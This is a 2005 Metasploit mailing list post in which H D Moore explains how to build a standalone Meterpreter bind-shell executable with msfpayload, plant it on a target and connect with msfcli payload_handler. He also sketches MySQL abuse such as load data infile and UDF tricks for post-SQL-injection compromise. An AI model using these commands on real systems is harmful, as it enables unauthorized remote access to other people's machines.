Metasploit mailing list archives
using Meterpreter , out of MSF // SQL Injection module
From: hdm at metasploit.com (H D Moore)
Date: Tue, 25 Oct 2005 23:11:19 -0500
On Tuesday 25 October 2005 19:07, Hamid . K wrote:
I was curious , if anyone tried to load meterpreter library , out of framework ?
The easy way: $ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe Copy this executable to the target system and find some way to execute it. After executing it, you can use the "payload_handler" exploit to connect and interact with it: $ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \ RHOST=<target_system> E Alternatively, you can use the source code in ./src and just build your own client/server implementation using it.
Second ; Is the idea of adding an automated sql-injection module to MSF .
The problem there is that version 2.x is exploit-driven - if you can't use one of the standard payloads or accomplish a very specific task, then it means writing a whole library around post-sql-injection remote compromise. Adding a mysql module means creating paylaods for uploading files or executing commands via the mysql stored procedures (load data infile, the UDF stuff that abuses blank passwords, etc). If someone came up with some plausible/useful payloads that would work with generic SQL injection, I would definitely be interested in integrating it. Version 3.x is going to include "recon" modules, so a generic table enumeration module would fit into it much better than 2.x. -HD
Current thread:
- using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module str0ke (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module H D Moore (Oct 25)
- using Meterpreter , out of MSF Hamid . K (Oct 26)
- using Meterpreter , out of MSF // SQL Injection module RaMatkal (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Jerome Athias (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module news-letters (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Fabrice MOURRON (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Andre Ludwig (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Kurt Grutzmacher (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module jasf (Oct 27)
- <Possible follow-ups>
- using Meterpreter , out of MSF // SQL Injection module ahead at mediageneral.com (Oct 27)